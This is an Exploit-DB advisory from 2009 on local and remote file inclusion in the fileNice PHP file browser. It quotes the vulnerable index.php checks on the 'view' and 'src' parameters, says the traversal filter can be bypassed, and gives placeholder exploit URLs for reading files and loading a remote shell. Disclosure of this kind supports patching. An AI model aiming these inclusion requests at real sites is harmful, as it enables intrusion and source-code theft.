fileNice PHP file browser - Local/Remote File Inclusion

Author: e.wiZz
type: webapps
platform: php
port: 
date_added: 2009-12-30 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comfileNice.zip

FileNice file browser RFI&LFI


By: e.wiZz!

#######Script site: http://filenice.com




In the wild...

###################################

######Vulnerability:


index.php

...
if(isset($_GET['view'])){
	if(substr($_GET['view'],0,2) != ".." && substr($_GET['view'],0,1) != "/" && $_GET['view'] != "./" && !stristr($_GET['view'], '../')){
		$out = new FNOutput;
		$out->viewFile($_GET['view']);
	}else{
		// someone is poking around where they shouldn't be
		echo("Don't hack my shit yo.");
		exit;
	}
}else if(isset($_GET['src'])){
	if(substr($_GET['src'],0,2) != ".." && substr($_GET['src'],0,1) != "/" && $_GET['src'] != "./" && !stristr($_GET['src'], '../')){
		$out = new FNOutput;
		$out->showSource($_GET['src']);
	}else{
		// someone is poking around where they shouldn't be
		echo("Don't hack my shit yo.");
		exit;
	}

...

here is some security check for dir-traversal(can be bypassed),but there is no check for RFI,
also you can see source of any file which is in parent directory:

http://inthewild/path/index.php?src=[lfi]   // index.php or whatever
http://inthewild/path/index.php?src=[remote shell]

btw. there is lot of other vulnerabilities...happy huntin' :)